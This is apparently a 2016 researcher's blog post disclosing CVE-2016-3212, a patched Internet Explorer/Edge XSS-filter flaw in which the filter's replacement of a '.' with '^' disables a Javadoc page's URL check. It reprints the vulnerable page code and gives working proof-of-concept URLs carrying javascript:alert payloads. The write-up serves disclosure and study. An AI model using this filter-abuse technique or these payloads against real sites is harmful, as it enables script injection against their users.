Friday, July 15, 2016

Abusing XSS Filter: One ^ leads to XSS (CVE-2016-3212)

In the past, I talked about XSS attacks exploiting the IE XSS filter at CODE BLUE, an information security conference in Japan. A similar bug was fixed in the June 2016 patch as CVE-2016-3212.
So, in this post, I would like to explain the details of this bug.

As described in my slides, by getting the XSS filter's rules applied in an unrelated context, we can turn the filter's own behavior of replacing a . with a # into an XSS attack, even when the page itself has no XSS bug.




To prevent such attacks, Microsoft changed the filter behavior in the December 2015 patch. Since that patch, the ^ is used as the replacement character for the . instead of the #. Indeed, this prevents the attacks above. But it brought another nightmare. A few months later, I confirmed an XSS using this behavior on a Google domain, and I received $3133.7 as a reward through the Google VRP.

Google sets the X-XSS-Protection: 1; mode=block header on almost all of their services, but not all of them. With mode=block the filter refuses to render the page instead of rewriting it, so the replacement never happens; only pages without mode=block are interesting here. So I carefully checked some pages that have no mode=block. As a result, I discovered a vulnerable page in the Javadoc on cloud.google.com.

I put up an approximate copy:

http://vulnerabledoma.in/xxn/xss_javadoc.html

This page becomes vulnerable to XSS when a single . is replaced with ^ by the XSS filter.
Can you find where it is?

The answer is the . between targetPage and indexOf(":") in the colon check (the part highlighted in yellow in the original post):
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<title>javadoc</title>
<script type="text/javascript">
    targetPage = "" + window.location.search;
    if (targetPage != "" && targetPage != "undefined")
targetPage = targetPage.substring(1);
if (targetPage.indexOf(":") != -1 || (targetPage != "" && !validURL(targetPage)))
        targetPage = "undefined";
    function validURL(url) {
        try {
            url = decodeURIComponent(url);
        }
        catch (error) {
            return false;
        }
        var pos = url.indexOf(".html");
        if (pos == -1 || pos != url.length - 5)
            return false;
        var allowNumber = false;
        var allowSep = false;
        var seenDot = false;
        for (var i = 0; i < url.length - 5; i++) {
            var ch = url.charAt(i);
            if ('a' <= ch && ch <= 'z' ||
                    'A' <= ch && ch <= 'Z' ||
                    ch == '$' ||
                    ch == '_' ||
                    ch.charCodeAt(0) > 127) {
                allowNumber = true;
                allowSep = true;
            } else if ('0' <= ch && ch <= '9'
                    || ch == '-') {
                if (!allowNumber)
                     return false;
            } else if (ch == '/' || ch == '.') {
                if (!allowSep)
                    return false;
                allowNumber = false;
                allowSep = false;
                if (ch == '.')
                     seenDot = true;
                if (ch == '/' && seenDot)
                     return false;
            } else {
                return false;
            }
        }
        return true;
    }
    function loadFrames() {
        if (targetPage != "" && targetPage != "undefined")
             top.classFrame.location = top.targetPage;
    }
</script>
</head>
<frameset cols="20%,80%" title="Documentation frame" onload="top.loadFrames()">
<frameset rows="30%,70%" title="Left frames" onload="top.loadFrames()">
<frame src="/" name="packageListFrame" title="All Packages">
<frame src="/" name="packageFrame" title="All classes and interfaces (except non-static nested types)">
</frameset>
<frame src="/" name="classFrame" title="Package, class and interface descriptions" scrolling="yes">
<noframes>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<h2>Frame Alert</h2>
<p>This document is designed to be viewed using the frames feature. If you see this message, you are using a non-frame-capable web client. Link to <a href="overview-summary.html">Non-frame version</a>.</p>
</noframes>
</frameset>
</html>
In the <script>, the page checks whether the string given via location.search is safe before loadFrames() navigates the classFrame to it: anything containing a : is rejected outright, and everything else has to pass validURL(), which only accepts a relative path made of identifier characters and ending in .html.
For example, the following unsafe URL is blocked:

http://vulnerabledoma.in/xxn/xss_javadoc.html?javascript:alert(1)

Then, what happens when that . is replaced with ^? targetPage.indexOf(":") becomes targetPage^indexOf(":"). That line still parses, because ^ is the XOR operator, but at run time indexOf is an undeclared identifier, so the statement throws a ReferenceError and the assignment targetPage = "undefined" never runs. Function declarations are hoisted, so loadFrames() exists regardless, and the frameset's onload calls it while targetPage still holds the javascript: URL taken from the query string. top.classFrame.location is then set to that URL.

Let's actually try it. If you put the following string into the URL of the target page, the page content is forced to match an XSS filter rule, and the . we are aiming at is replaced with ^:



You can reproduce this bug from the following URL using IE/Edge without the June 2016 patch (the // after alert(1) turns the rest of the query string, which only exists to trigger the filter rule, into a JavaScript comment, so it does not interfere with the payload):

http://vulnerabledoma.in/xxn/xss_javadoc.html?javascript:alert(1)//"++++++++++++.i+++=

I also put up a copy of the page with the replacement already applied, for those who have already installed the patch. You can confirm the same behavior there:

http://vulnerabledoma.in/xxn/xss_javadoc2.html?javascript:alert(document.domain)

The crucial difference between # and ^ is that # is not an operator in JavaScript, but ^ (bitwise XOR) is. For example, if a.b; is in the page and it is replaced with # or ^, a#b; is a syntax error, but a^b; is valid syntax. A syntax error throws away the whole script, so nothing in it ever runs; valid syntax lets the script run up to the rewritten statement and keeps its hoisted functions alive. That is what brings the XSS bug.




Since the June 2016 patch, when the XSS filter replaces a ., the mode=block behavior is enforced even if the page has no X-XSS-Protection header, so the rewritten page is never rendered.

I was surprised and disgusted when I saw the ^ displayed, but anyway, it has finally calmed down!

Also, in the most recent patch (July 2016), it seems that Microsoft killed almost all possibilities of XSS attacks exploiting the XSS filter. I will write about the details in the next post :)

Thanks!
